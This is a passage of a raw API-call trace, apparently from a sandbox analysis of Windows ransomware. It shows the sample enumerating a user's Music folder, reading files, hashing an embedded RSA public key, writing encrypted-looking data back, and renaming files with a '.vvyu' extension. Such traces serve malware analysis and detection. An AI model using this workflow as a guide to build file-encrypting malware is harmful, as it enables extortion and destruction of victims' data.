hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d160 | out: hHeap=0x6a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.151] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x560c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x560c, lpOverlapped=0x0) returned 1 [0197.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.151] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x5611, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.151] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.153] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.153] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.153] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.153] CloseHandle (hObject=0x52c) returned 1 [0197.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0197.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d3a670 [0197.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0197.157] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\kf5kyH.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\kf5kyh.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\kf5kyH.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\kf5kyh.m4a.vvyu")) returned 1 [0197.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.159] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.162] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd988ccd0, ftCreationTime.dwHighDateTime=0x1d8a544, ftLastAccessTime.dwLowDateTime=0x6d19b3f0, ftLastAccessTime.dwHighDateTime=0x1d8a721, ftLastWriteTime.dwLowDateTime=0x6d19b3f0, ftLastWriteTime.dwHighDateTime=0x1d8a721, nFileSizeHigh=0x0, nFileSizeLow=0x146e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pE7_nJD0Tmm8m2VYvr.wav", cAlternateFileName="PE7_NJ~1.WAV")) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.163] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\pE7_nJD0Tmm8m2VYvr.wav") returned=".wav" [0197.163] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\pE7_nJD0Tmm8m2VYvr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\pe7_njd0tmm8m2vyvr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.164] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=83685) returned 1 [0197.164] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.168] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x146bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.168] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.171] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.171] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x146e5, lpOverlapped=0x0) returned 1 [0197.172] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.172] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.172] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.172] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.173] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.173] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.173] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.173] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.173] GetLastError () returned 0x0 [0197.173] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.173] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.173] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.173] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.173] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x146f0) returned 0x2d4f778 [0197.174] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d160 [0197.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d1a8 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.175] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3a8 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a390 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.178] GetCurrentThreadId () returned 0x264 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4b9d0 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.179] GetCurrentThreadId () returned 0x264 [0197.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3a8 [0197.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a408 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a420 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3c0 [0197.183] 